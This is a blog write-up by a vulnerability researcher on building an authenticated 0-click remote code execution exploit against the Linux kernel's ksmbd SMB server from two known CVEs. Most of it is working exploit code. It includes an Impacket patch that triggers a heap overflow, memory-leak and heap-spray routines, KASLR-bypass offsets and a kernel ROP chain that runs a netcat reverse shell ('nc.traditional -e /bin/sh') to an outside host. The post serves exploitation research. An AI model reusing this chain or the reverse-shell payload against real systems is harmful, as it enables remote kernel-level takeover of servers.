Will's Root: 2025

What would a vulnerability researcher's magnum opus be? For me, it would be a 0-click 0-day exploit chain against a popular platform or device in the modern era. No interaction needed, system pwned.

Unfortunately, this is a difficult task to achieve these days. So towards the end of my post-grad summer, I decided to practice designing a stable (> 95% success rate) authenticated 0-click exploit from real-world CVEs. As you likely guessed from the title, we are targeting ksmbd, or Kernel SMB3 Daemon. Yes, you heard that right, Linux has a kernelspace SMB3 server because userspace just isn’t enough. Thank you, Microsoft!

The beginning of many remote bugs...

Here is a demo of my end to end exploit (at a 2x speedup)!

Onto the writeup now.

ksmbd makes sense as a target for a multitude of reasons.

It is reachable over the network
It has a ton of vulnerabilities, including a 0-click RCE exploit from Guillaume Teissier and Quentin Minster of Thalium (end of 2022)
Many of these vulnerabilities are not hard to reach and are quite surprising to appear in such abundance in the modern era
There has been existing research on attacking ksmbd: the aforementioned 0-click has a whole online video, which I highly recommend you to watch. I myself found an unauthenticated remote DOS back in 2023 with Hrvoje Misetic, and there are a multitude of other posts discussing vulnerabilities from pwning.tech to doynsec
ZDI also has a nice collection of advisories for the vulnerabilities as well that gave me a quick overview of each CVE’s exploit implications
There may be a lot of existing work on discussing vulnerabilities, but there is only one major presentation as I mentioned earlier... where is the fun in vulnerability research if you don’t write exploits?

I would have to say the only “downside” from a coolness factor is that ksmbd is rarely deployed in production. To every sysadmin out there, keep it this way for your own sake.

Choosing the Bugs

I perused through the ZDI 2024 advisories and decided upon two CVEs. Network RCE exploits generally requires multiple bugs, and each bug has to provide a very useful primitive, since we no longer have the ability to locally manipulate the internal kernel state through syscalls. They remind me in a way of the notorious heap note challenges from CTFs.

My target was 6.1.45, a 2 year out-of-date version, running on a single x86_64 core with all the available standard mitigations (SMAP, SMEP, KPTI, KASLR, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED, etc.). I really hope no one is running this version with ksmbd enabled and exposed…

ZDI-24-229 (CVE-2023-52440) was the first: ksmbd: fix slub overflow in ksmbd_decode_ntlmssp_auth_blob(). This bug was discovered by Pumpkin of DEVCORE. Let us take a look at the patch:

@@ -355,6 +355,9 @@ int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob, if (blob_len < (u64)sess_key_off + sess_key_len) return -EINVAL; + if (sess_key_len > CIFS_KEY_SIZE) + return -EINVAL; + ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL); if (!ctx_arc4) return -ENOMEM;

This vulnerable snippet can be triggered during NTLM authentication through a SMB2_SESSION_SETUP message. Since sess_key_len is user controlled, we can cause an overflow of the fixed size sess_key buffer when executing cifs_arc4_crypt. This is actually quite an easy bug to trigger and gives us a controlled SLUB overflow.

In Impacket (commit 7561038277f4b08a16f37aac886cfe0193e75434), you can trigger this bug by just modifying a single line in getNTLMSSPType3 in ntlm.py. You can set session_key in ntlmChallengeResponse to a blob of any length, and you can achieve a controlled SLUB overflow by running cifs_arc4_crypt on the target payload with sessionBaseKey as the context.

if version is not None: ntlmChallengeResponse['Version'] = version ntlmChallengeResponse['ntlm'] = ntResponse if encryptedRandomSessionKey is not None: if os.getenv('IMPACKET_OVERFLOW_NTLM'): print('making evil session_key') ctx = ARC4Ctx() cifs_arc4_setkey(ctx, sessionBaseKey, len(sessionBaseKey)) data = base64.b64decode(os.getenv('IMPACKET_OVERFLOW_NTLM')) ntlmChallengeResponse['session_key'] = cifs_arc4_crypt(ctx, data) else: ntlmChallengeResponse['session_key'] = encryptedRandomSessionKey return ntlmChallengeResponse, exportedSessionKey

Honestly, this is an awesome primitive: unauthenticated remote controlled heap overflow of content and size. Based on the Thalium primitive, this is the equivalent of their “writeheap” primitive. We are restricted to kmalloc-512 with the bug here.

Now, we need to find a leakage vector. This vector is actually what downgraded our 0-click from an “unauthenticated” one to an “authenticated” one, just like the Thalium 0-click. We require a primitive that leaks contents back through the response buffers. I decided on ZDI-24-587, which is an authenticated remote leak bug. Pumpkin discovered this yet again and it is assigned CVE-2023-4130. Let us take a look at the commit, which is titled ksmbd: fix wrong next length validation of ea buffer in smb2_set_ea().

diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c index 9849d748934599..7cc1b0c47d0a20 100644 --- a/fs/smb/server/smb2pdu.c +++ b/fs/smb/server/smb2pdu.c @@ -2324,9 +2324,16 @@ next: break; buf_len -= next; eabuf = (struct smb2_ea_info *)((char *)eabuf + next); - if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength)) + if (buf_len < sizeof(struct smb2_ea_info)) { + rc = -EINVAL; break; + } + if (buf_len < sizeof(struct smb2_ea_info) + eabuf->EaNameLength + + le16_to_cpu(eabuf->EaValueLength)) { + rc = -EINVAL; + } } while (next != 0); kfree(attr_name);

Given write access to the SMB share filesystem, a user can write extended attributes onto files, which Linux emulates through xattr in the vfs layer. Utilizing this feature in impacket requires us to use the setInfo function on SMB3 objects with infoType set as SMB2_0_INFO_FILE and fileInfoClass set as SMB2_FULL_EA_INFO.

Looking at the original vulnerable code:

do { if (!eabuf->EaNameLength) goto next; ksmbd_debug(SMB, "name : <%s>, name_len : %u, value_len : %u, next : %u\n", eabuf->name, eabuf->EaNameLength, le16_to_cpu(eabuf->EaValueLength), le32_to_cpu(eabuf->NextEntryOffset)); if (eabuf->EaNameLength > (XATTR_NAME_MAX - XATTR_USER_PREFIX_LEN)) { rc = -EINVAL; break; } memcpy(attr_name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN); memcpy(&attr_name[XATTR_USER_PREFIX_LEN], eabuf->name, eabuf->EaNameLength); attr_name[XATTR_USER_PREFIX_LEN + eabuf->EaNameLength] = '\0'; value = (char *)&eabuf->name + eabuf->EaNameLength + 1; if (!eabuf->EaValueLength) { rc = ksmbd_vfs_casexattr_len(user_ns, path->dentry, attr_name, XATTR_USER_PREFIX_LEN + eabuf->EaNameLength); /* delete the EA only when it exits */ if (rc > 0) { rc = ksmbd_vfs_remove_xattr(user_ns, path->dentry, attr_name); if (rc < 0) { ksmbd_debug(SMB, "remove xattr failed(%d)\n", rc); break; } } /* if the EA doesn't exist, just do nothing. */ rc = 0; } else { rc = ksmbd_vfs_setxattr(user_ns, path->dentry, attr_name, value, le16_to_cpu(eabuf->EaValueLength), 0); if (rc < 0) { ksmbd_debug(SMB, "ksmbd_vfs_setxattr is failed(%d)\n", rc); break; } } next: next = le32_to_cpu(eabuf->NextEntryOffset); if (next == 0 || buf_len < next) break; buf_len -= next; eabuf = (struct smb2_ea_info *)((char *)eabuf + next); if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength)) break; } while (next != 0);

And the original struct:

struct smb2_ea_info { __le32 NextEntryOffset; __u8 Flags; __u8 EaNameLength; __le16 EaValueLength; char name[1]; /* optionally followed by value */ } __packed; /* level 15 Query */

We can see that in the next block, we can trick ksmbd into thinking there are additional smb2_ea_info entries by setting NextEntryOffset to a malicious value, as long as we do not exceed our buffer bounds. However, we can still type-confuse this fake next smb2_ea_info with our controlled data in the current name field to provide us with an evil EaValueLength. This will allow the subsequent ksmbd_vfs_setxattr to store OOB read data of adjacent heap chunks into xattr, which we can fetch with SMB3.queryInfo using the same fileInfoClass. The only limitation is that our leak is somewhat limited due to this nonsensical check, which I am pretty sure is a mistake given the context. It requires the sum of our type-confused EaNameLength and EaValueLength be under the next value. Regardless, we can still achieve some substantial leaks from this. This is the equivalent of the “writeleak” primitive from the Thalium 0-click.

I constructed the following make_evil primitive to construct malicious smb2_ea_info structs for me:

# will leak -0x10 less def make_evil(size): assert(size >= 0x20) # 12 bytes left till size after this evil_ea_name = b'evil.name' + b''.ljust(size - 12 - 9 + 1 - 12, b'A') + b'\x00\x00\x00' evil_value_name = p32(0) + p8(0) + p8(3) + p16(size - 0x10) + b'oof\x00' evil_entry = FILE_FULL_EA_INFORMATION() evil_entry['NextEntryOffset'] = size - 12 evil_entry['Flags'] = 0 evil_entry['EaNameLength'] = len(evil_ea_name) - 1 evil_entry['EaValueLength'] = len(evil_value_name) evil_entry['EaName'] = evil_ea_name evil_entry['EaValue'] = evil_value_name return evil_entry

This structure is inlined with smb request structures (more on this later) in ksmbd, so we construct the name buffer to pad this request allocation to size to leak size - 0x10 bytes. If you look at this carefully, we point NextEntryOffset to the value buffer to type confuse it as another smb2_ea_info structure. The fake EaNameLength and fake EaValueLength are all chosen to pass the nonsensical check.

The evil smb2_ea_info object

Using make_evil, I can construct a leak primitive.

def leak(leaker, tid, fid, amount): # can't arbitrarily leak because of this nonsensical check # https://elixir.bootlin.com/linux/v6.1.45/source/fs/smb/server/smb2pdu.c#L2343 entries = [make_evil(amount-0x65)] entries = [e.getData() for e in entries] leaker.setInfo( tid, fid, inputBlob=b''.join(entries), infoType=SMB2_0_INFO_FILE, fileInfoClass=SMB2_FULL_EA_INFO ) result = leaker.queryInfo( tid, fid, fileInfoClass=SMB2_FULL_EA_INFO ) _, leak = deserialize_ea(result) leak = leak[2:] dump_x_gx(leak) return leak

While this will leak kernel heap contents, the next controlled allocation almost never lands where this leaky request was allocated, so we cannot use it to reliably predict the exact heap layout.

To summarize, on Linux 6.1.45 (as the leak bug was backported by 6.1.46), we can pwn ksmbd through users with write access to a share. I consider this an authenticated 0-click as you would need user credentials, but I am sure that there is at least one sysadmin out there who allows anonymously writeable shares.

Here is the sample ksmbd.conf file I used to simulate a vulnerable system.

[CompanyShare] ; share parameters force user = fossboss path = /CompanyShare read only = no

Kernel slabs are also technically per-CPU so I did most of my development on a single core setup. The approach I present applies to multi-core setups though, at the cost of some speed (and stability issues at the end). For what it's worth, the exploit successfully worked with 2 cores too.

ksmbd Crash Course + Thalium's Strategy

Before continuing onto the exploit, I shall provide an extremely high-level overview of some important ksmbd behaviors, and discuss the changes in exploit strategies since the Thalium 0-click.

The two most important structs in our exploit are ksmbd_conn (kmalloc-1k) and ksmbd_session (kmalloc-512). If you are unfamiliar with the Linux slub allocator, I recommend this presentation. There is a plethora of other structs in this subsystem, but I did not need any of them for the exploit.

Ksmbd operates from kernel worker threads. On a new tcp connection, a ksmbd_conn object is allocated through kzalloc and the kernel calls ksmbd_conn_handler_loop in a new thread. The request buffer has a dynamic size and is allocated in this function. This is useful because smb2_ea_info is allocated inline in this request, providing us a with dynamic heap allocation primitive. Sadly, the request is freed right after handling. From my debugging, the initial header before the first smb2_ea_info struct took up 0x65 bytes. Note that by using this primitive in kmalloc-1k to leak adjacent ksmbd_conn contents, we achieve a KASLR bypass due to the use of pointers to kernel data section.

Then process_fn from default_conn_ops is called, which subsequently sends the request for processing in a worker thread through ksmbd_server_process_request -> queue_ksmbd_work. Work processing eventually calls __handle_ksmbd_work, which finally dispatches __process_request.

There are many different cmd handlers, such as the one that leads to the OOB read vulnerability. The one we particularly care about is the session setup cmd, which is defined here and creates a ksmbd_session object. This represents a single session in a ksmbd tcp connection, and it is allocated here through kzalloc.

Session setup via NTLM takes place in two parts, as it is a challenge response protocol. Note that while the session object is allocated during the challenge phase, the SLUB overflow happens in the challenge part of the protocol, and we can repeatedly re-run that part of the protocol. This will prove extremely useful later on.

Now, let's discuss some changes I observed in ksmbd since the Thalium 0-click.

Because kmalloc-512 is relatively noisy, their exploit relied on something known as compound requests (which was also the source of many ksmbd bugs). This way, multiple sessions could be allocated in one go via a tight loop, with less chance of other interfering allocations. However, when allocating a new session, ksmbd expires other sessions in the connection that have finished authentication, but we wouldn’t be able to do that without first receiving a response due to the challenge-response nature of NTLM.

Another trick in their exploit was tampering with ksmbd_session->id to side-channel out information regarding the results of an overflow (such as which session was affected, etc.). However, at least from my experiments, this is no longer possible since there seems to be a per-connection xarray and a global hash table for tracking sessions.

Thalium also had an awesome heap spray primitive that no longer exists. The idea was to hang the tcp read attempt of the whole request in ksmbd_tcp_readv. Unfortunately, ksmbd limits data reception to 2 attempts now with very short timeout intervals.

Their last trick, which is still applicable today, was for RIP control. They overflowed the nls_table pointer in the ksmbd_session object to redirect it to a forged object with a malicious vtable. Then, during the NTLM response phase (which we can repeatedly run), the following call chain happens: ntlm_authenticate -> session_user -> smb_strndup_from_utf16 -> smb_utf16_bytes, which uses a function pointer to fetch character lengths. However, this pointer now exists in kmalloc-1k as part of ksmbd_conn, so we will need to find a way to transform our memory corruption primitive in kmalloc-512 to affect kmalloc-1k. I did not look for some other target in kmalloc-512, but I'm sure one exists.

Ok, now let’s get to pwning ksmbd.

Our New Strategy

Let’s first analyze how we can spray. For each connection, we can allocate a ksmbd_conn and a ksmbd_session object. How many can we have at once? How long can each connection last?

The answers to those questions are determined by the server_conf module global. max_connections determines the active connection limit, and deadtime determines the timeout. By default, the values were 0x80 and 0x0, respectively, with 0 for the latter representing infinite time. The maximum connection count is good for us because kmalloc-512 and kmalloc-1k only have 16 elements per slab, making it easier to massage the heap with freelist randomization.

However, as I discovered later in the exploit, not only is kmalloc-512 busy, kmalloc-1k is also an active slab, especially due to tcp replies from ksmbd! I have found the kernel kmem trace framework extremely useful for debugging heap noise and highly recommend others try it out (I have used this to debug cross cache attacks in my other recent exploits). Anyways, this was a backtrace I repeatedly saw that was causing activity in kmalloc-1k:

kworker/0:4-302 [000] ..... 94.399734: kmalloc: call_site=tcp_stream_alloc_skb+0x28/0x130 ptr=ffff888102d32000 bytes_req=1024 bytes_alloc=1024 gfp_flags= node=-1 accounted=false kworker/0:4-302 [000] ..... 94.399741: <stack trace> => trace_event_raw_event_kmalloc => __kmalloc_node_track_caller => __alloc_skb => tcp_stream_alloc_skb => tcp_sendmsg_locked => tcp_sendmsg => sock_sendmsg => ksmbd_tcp_writev => ksmbd_conn_write => handle_ksmbd_work => process_one_work => worker_thread => kthread

Luckily, this chunk is often freed after e1000 processing, before other kmalloc-1k allocations.

<idle>-0 [000] ..s2. 94.402376: kfree: call_site=skb_release_data+0x139/0x180 ptr=ffff888102d32000 <idle>-0 [000] ..s2. 94.402395: <stack trace> => trace_event_raw_event_kfree => kfree => skb_release_data => __kfree_skb => tcp_ack => tcp_rcv_established => tcp_v4_do_rcv => tcp_v4_rcv => ip_protocol_deliver_rcu => ip_local_deliver_finish => ip_sublist_rcv_finish => ip_sublist_rcv => ip_list_rcv => __netif_receive_skb_list_core => netif_receive_skb_list_internal => napi_complete_done => e1000_clean

Generally, these ephemeral allocations didn’t cause too much of an issue during a short window, but I did encounter a lot more instability when expecting the heap state to remain the same over a longer period of time. This means we have to be very precise with the sessions we choose to utilize for triggering primitives in our exploit, rather than blindly gunning for a homerun with a large spray.

Remember from earlier that our overflow is in kmalloc-512, but our target pointer to corrupt for vtable hijacking is in kmalloc-1k? We can rely on the overflow bug to overwrite one of the many pointers that ksmbd_session frees in order to trigger an arbitrary free primitive onto kmalloc-1k. In fact, one such pointer is the Preauth_HashValue field, which can be freed in the response phase of session setup. There aren’t checks against misaligned frees from the allocator, so we can now allocate an object with our controlled data to overlap with an existing ksmbd_conn object to overwrite the local_nls field.

Pivoting from kmalloc-512 overflow to kmalloc-1k overwrite

This overflow into ksmbd_session poses some problems, though. When overflowing into the adjacent ksmbd_session struct, many of the fields afterwards are overridden. We must keep this connection alive to avoid a crash in ksmbd_session_destroy. For example, id actually poses a major issue. An incorrect value here leads to a double free, which the allocator catches, so we must also identify this session and keep it alive. I did not look too far into why this is the case, though assume it has to do with the fact that sessions are kept track in separate structures and an id mismatch causes some sort of desynchronization.

Overflow and corruption of ksmbd_session object

Exploit Development

The first goal would be to leak the contents of a ksmbd_session to help us keep the overflowed ksmbd_session in a “valid” state during our operations (asides from disconnection). I first created a leaker connection to achieve this.

def conn(): return SMBConnection(ADDRESS, TARGET_IP, sess_port=PORT, preferredDialect=SMB2_DIALECT_311, timeout=30000) def open_file(conn, tid): return conn.create( tid, FILENAME, desiredAccess=FILE_READ_DATA | FILE_WRITE_DATA | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | FILE_READ_EA | FILE_WRITE_EA, shareMode=FILE_SHARE_READ | FILE_SHARE_WRITE, creationOptions=FILE_NON_DIRECTORY_FILE, creationDisposition=FILE_OVERWRITE_IF, fileAttributes=FILE_ATTRIBUTE_NORMAL ) leaker = conn() leaker.login(USER, PW, DOMAIN) leaker = leaker._SMBConnection assert leaker.getDialect() == SMB2_DIALECT_311

Then, we spam a bunch of ksmbd_session objects left in the first stage of the session request. Normally, Impacket completes the challenge and response in one function, but I broke login apart into login_init and login_finish.

We can identify valid session objects and track the owning connection through the ClientGUID field. By default, impacket uses a random string, but I added a fixed string component of 10 C’s for identification purposes. Now, we can repeatedly allocate connections, attempt a leak, and check for a live connection’s GUID. If none exist, we close all the currently sprayed connections and try again. This spray, check, free loop is a common pattern in this exploit and makes it very reliable.

spray1 = 0x18 spray2 = spray1 + 0x10 spray3 = spray2 + 0x18 spray4 = spray3 + 0x18 conns = [None for i in range(spray4)] kmalloc512_leak = None kmalloc512_leak_q = None kmalloc1k_leak = None kmalloc1k_leak_q = None target_conn = None tid = leaker.connectTree(SHARE) fid = open_file(leaker, tid) while True: for i in range(spray1): log.info(f"spraying conn {i}") # struct ksmbd_conn alloc conns[i] = conn() # struct ksmbd_session alloc conns[i]._SMBConnection.login_init(USER, PW, DOMAIN) # spray and retry, because of slab noise and slab randomization # a bigger kmalloc-1024?, then kmalloc-512, potentially a few other allocs log.info('leakage of kmalloc-512') kmalloc512_leak = leak(leaker, tid, fid, 0x200) kmalloc512_leak_q = extract_qwords(kmalloc512_leak) if kmalloc512_leak_q[2] != 0x4343434343434343: log.info('leak failed, trying again') for i in range(spray1): conns[i]._SMBConnection.close_session() fid = open_file(leaker, tid) else: break

0x10 - 0x18 makes sense for a spray parameter due to the fact that both kmalloc-512 and kmalloc-1k only hold 16 items each.

After leaking a valid ksmbd_session, I reuse the data for the SLUB overflow portion of the exploit. My goal here is not to perform the arbitrary free next, but to identify the overflowed connection (labeled as overflowed_conn in the exploit). This way, I can pinpoint the exact victim connection to narrow the window between freeing and reclaiming with a ksmbd request. The leaked data won't cleanly preserve an overflowed session, but is enough for it survive the next step.

While the session id can no longer act as an oracle, corrupting the session state for a subsequent operation that is not echo, negotiation or session setup can act as a substitute. The relevant call chain starts from here, which calls ksmbd_session_lookup_all and makes this check. If we finish session setup on all of the sprayed sessions, and subsequently overflow a connection, we can then attempt a share connect for all of the sprayed sessions. The failed one will respond with an error. We can also repeat this in a loop until an overflow actually happens. The session object from which the overflow happens must remain alive, but we have at least 0x20 chances for this to occur. I have not observed more than 5-6 attempts for a successful overflow as the slab has few objects.

overflowed_conn = None failed_evils = [] while True: evil = conn() for i in range(spray1, spray2): log.info(f"spraying conn {i}") conns[i] = conn() conns[i]._SMBConnection.login_init(USER, PW, DOMAIN) log.info(f"allocate evil") # ksmbd_session allocate evil._SMBConnection.login_init(USER, PW, DOMAIN) for i in range(spray2, spray3): log.info(f"spraying conn {i}") conns[i] = conn() conns[i]._SMBConnection.login_init(USER, PW, DOMAIN) for i in range(spray1, spray3): conns[i]._SMBConnection.login_finish() # set a potential state as in progress to see if any error payload = (b'Z' * 40 + (kmalloc512_leak[0x68:]).ljust(0x200 - 0x68, b'Z') + kmalloc512_leak[:0x34]) + p32(1) os.environ['IMPACKET_OVERFLOW_NTLM'] = base64.b64encode(payload).decode() # note when logging in, a kmalloc-512 allocation is made and then freed for storing cipher stuff evil._SMBConnection.login_finish() os.environ.pop("IMPACKET_OVERFLOW_NTLM", None) for i in range(spray1, spray3): try: log.info(f'attempting tree connect on {i}') conns[i]._SMBConnection.connectTree(SHARE) except impacket.smb3.SessionError: overflowed_conn = i log.info(f'overflowed connection: {overflowed_conn}') break if overflowed_conn is None: # note that we are limited in total attempts in this # but we should be able to hit in a few tries at most log.info('overflow failed, retrying') for i in range(spray1, spray3): conns[i]._SMBConnection.close_session() failed_evils.append(evil) else: break

Once we have achieved an overflow against an exploitable heap layout, we can repeat the overflow from the evil session onto the overflow_conn session to reliably help trigger an arbitrary free.

Next, we would need a heap leak to find a ksmbd_conn object as well as a KASLR leak. The ksmbd_conn connection provides both. The srv_mutex field has a linked list that points to itself. There are multiple pointers to kernel data at the start of the object. We can repeat the same strategy as earlier but with an evil smb2_ea_info in kmalloc-1k: we identify whether we have leaked an active connection through the GUID field, and try again otherwise.

while True: for i in range(spray3, spray4): log.info(f"spraying conn {i}") conns[i] = conn() conns[i]._SMBConnection.login_init(USER, PW, DOMAIN) # a bigger kmalloc-2048?, then kmalloc-1024, potentially a few other allocs log.info('leakage of kmalloc-1024') kmalloc1k_leak = leak(leaker, tid, fid, 0x400) kmalloc1k_leak_q = extract_qwords(kmalloc1k_leak) if kmalloc1k_leak_q[0] & 0xffff == 0xdd00: guid = (p64(kmalloc1k_leak_q[35]) + p64(kmalloc1k_leak_q[36])).decode() print(f'guid is: {guid}') for i in range(spray4): if guid == conns[i]._SMBConnection.ClientGuid: target_conn = i log.info(f'found target conn based on guid at {target_conn}') if target_conn != None: break log.info('failed, trying again') for i in range(spray3, spray4): conns[i]._SMBConnection.close_session() fid = open_file(leaker, tid)

With this pointer leaked, we can arbitrarily free a misaligned chunk (named target) above the leaked ksmbd_conn object to prepare for an overwrite by triggering the response phase of session setup. I calculated the offsets of a few gadgets I used to finish the exploit at this point.

target = kmalloc1k_leak_q[6] - 0x30 - 0x1c0 smb311_server_values = kmalloc1k_leak_q[0] kaslr_base = smb311_server_values - (0xffffffff82fcdd00 - 0xffffffff81000000) rebase = lambda orig_addr : kaslr_base + (orig_addr - 0xffffffff81000000) # 0xffffffff810f4533: leave ; ret ; leave_ret = rebase(0xffffffff810f4533) # 0xffffffff81031157: pop rdi ; ret ; pop_rdi = rebase(0xffffffff81031157) # 0xffffffff8105c524: pop rsi ; ret ; pop_rsi = rebase(0xffffffff8105c524) # 0xffffffff810aac72: pop rdx ; ret ; pop_rdx = rebase(0xffffffff810aac72) # 0xffffffff81245e83: pop rcx ; ret ; pop_rcx = rebase(0xffffffff81245e83) # 0xffffffff811eaf20: pop rsp ; ret ; pop_rsp = rebase(0xffffffff811eaf20) ''' x/50gx 0xffffffff82e5ee00 0xffffffff82e5ee00 <envp.0>: 0xffffffff827e612a 0xffffffff827e6131 0xffffffff82e5ee10 <envp.0+16>: 0xffffffff82843918 0x0000000000000000 ''' envp = rebase(0xffffffff82e5ee00) call_usermodehelper = rebase(0xffffffff810e9e40) msleep = rebase(0xffffffff8115ffc0) log.info(f'kaslr: {hex(kaslr_base)}') log.info(f'stack pivot: {hex(leave_ret)}') log.info(f'pop rdi: {hex(pop_rdi)}') log.info(f'pop rsi: {hex(pop_rsi)}') log.info(f'pop rdx: {hex(pop_rdx)}') log.info(f'pop rcx: {hex(pop_rcx)}') log.info(f'pop_rsp: {hex(pop_rsp)}') log.info(f'envp: {hex(envp)}') log.info(f'call_usermodehelper: {hex(call_usermodehelper)}') log.info(f'msleep: {hex(msleep)}') log.info(f'choosing our target: {hex(target)}') payload = (b'Z' * 40 + (kmalloc512_leak[0x68:]).ljust(0x200 - 0x68, b'Z') + p64(0xbaad) + p16(0x311) + b'X' * 16 + kmalloc512_leak[0x8+18:0x38] + p64(target)) os.environ['IMPACKET_OVERFLOW_NTLM'] = base64.b64encode(payload).decode() # note when logging in, a kmalloc-512 allocation is made and then freed for storing cipher stuff evil._SMBConnection.login_finish() os.environ.pop("IMPACKET_OVERFLOW_NTLM", None)

Our end goal is to just call call_usermodehelper to pop a reverse shell and put the kernel thread into infinite sleep with msleep in the ROP chain.

With the arbitrary free, we can reclaim the misaligned chunk and overwrite the target ksmbd_conn object with a large enough ksmbd request to go into kmalloc-1k. The data we control has to start a bit further into the request because earlier parts of the payload get overwritten (perhaps by tcp sk_buff processing?).

Initially, I hijacked the local_nls pointer to redirect to a vtable (forged upon the ksmbd_conn object) where the function pointer had the value of 0x1337babebaadbeef. The kernel crash showed the following:

[ 209.080442] RAX: 1337babebaadbeef RBX: 0000000000000000 RCX: ffff888102d97b00 [ 209.084157] RDX: 0000000000000006 RSI: ffffc90000043db2 RDI: 0000000000000066 [ 209.087849] RBP: ffff888102d97b00 R08: ffff888102d97c00 R09: 0000000000000052 [ 209.091570] R10: 000000000000000a R11: d9b8d6dba644bded R12: ffff888102f70052 [ 209.095254] R13: 0000000000000008 R14: 0000000000000010 R15: 0000000000000000

In this case, the target for the arbitrary free was 0xffff888102d97a40, so we control the contents that rbp, rcx, and r8 point to (potentially at an offset). The rbp and rcx registers also point to the base of the nls_table object we forged.

To successfully ROP, we would have to stack pivot into the misaligned chunk with our controlled data. These days, finding good kernel gadgets with traditional ROP chain tooling like rp++ or ROPGadget can be frustrating due to runtime patching and micro-architectural side-channel mitigations - I usually just revert to using objdump. Luckily for us here, we control rbp so we can just rely on a leave; ret gadget to pivot into our controlled data. Here is how I laid out the ROP chain:

cmd_base = target + 0x168 cmd = [b'/usr/bin/nc.traditional\x00', b'-e\x00', b'/bin/sh\x00', b'ctfi.ng\x00', b'16549\x00'] cmd_argv = b''.join( map(p64, (cmd_base + offset for offset in accumulate([0] + [len(x) for x in cmd[:-1]]))) ) evil_nls = (p64(0x4141414141414141) + p64(pop_rdi) + p64(leave_ret) + p64(pop_rdi) + p64(cmd_base) + p64(pop_rsi) + p64(target + 0x138) + p64(pop_rdx) + p64(envp) + p64(pop_rcx) + p64(0) + p64(call_usermodehelper) + p64(pop_rdi) + p64(0x7fffffff) + p64(msleep) + cmd_argv + p64(0x0) + b''.join(c for c in cmd)) payload = (b'\x68' * (0x4+8*11) + evil_nls.ljust(0x1c0-0x68-8*11, b'\x68') + kmalloc1k_leak[:0x58] + p64(target+0xc0) + kmalloc1k_leak[0x60:0x238-0x70]) log.info(f'payload len: {hex(len(payload))}') log.info('triggering arb free') # free preauth_hash with authentication path conns[overflowed_conn]._SMBConnection.login_finish() try: leaker.setInfo( tid, fid, inputBlob=payload, infoType=SMB2_0_INFO_FILE, fileInfoClass=SMB2_FULL_EA_INFO ) except: pass log.info('vtable should be hijacked') conns[target_conn]._SMBConnection.login_finish()

Then, in the last line, we just attempt the second stage of session setup on the corrupted ksmbd_conn object to trigger the ROP chain and pop a reverse shell!

The whole exploit can be found here.

There are some limitations though. The last stage is unstable on multi-core setups due to per-CPU slabs. The corrupted connections must remain alive, and some commands will cause the kernel to crash due to the corrupted heap. In a real world exploit, one would have to spend time to clean up the kernel after receiving a reverse shell (if that's what they even want) for post-exploitation stability and persistence. I did not really spend any time attempting those ideas as this was meant as just a research exercise :)

Overall, this was my first attempt at a kernel network 0-click exploit. ksmbd isn’t very commonly deployed, but this was still a really fun exercise - hopefully I can eventually find my magnum opus of an exploit! Thank you to syst3mfailure.io for the support during this experience and to the rest of the Crusaders of Rust security research group for feedback on this article. Thank you also to the MATCHA group at MIT CSAIL for the opportunity of a post-grad, summer of kernel security research. As always, feel free to let me know of any questions, concerns, corrections, inquiries, or anything else.

Will's Root

Search This Blog

Sunday, September 14, 2025

Eternal-Tux: Crafting a Linux Kernel KSMBD 0-Click RCE Exploit from N-Days

Choosing the Bugs

ksmbd Crash Course + Thalium's Strategy

Our New Strategy

Exploit Development